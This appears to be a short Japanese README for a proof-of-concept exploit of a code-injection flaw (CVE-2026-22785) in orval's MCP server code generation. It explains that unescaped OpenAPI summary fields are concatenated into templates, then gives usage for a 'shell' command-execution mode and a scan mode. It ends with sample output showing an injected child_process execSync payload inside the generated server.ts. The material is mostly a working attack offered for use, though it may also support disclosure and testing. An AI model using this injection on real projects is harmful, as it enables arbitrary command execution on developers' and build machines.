
orval < 7.18.0 は MCP サーバーコードを生成する際、OpenAPI 仕様の summary フィールドをテンプレートに直接連結し、エスケープ処理を行わないため、コードインジェクションが発生します。
cd exploit
npm install
# コマンド実行(脆弱性の悪用)
python cve_tool.py shell <コマンド>
# 例
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# ファイルのスキャン
python cve_tool.py scan <ファイル>
<コマンド出力>
[+] CVE-2026-22785: Payload 注入成功
[+] 注入位置: server.ts:31
server.ts 生成コード:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);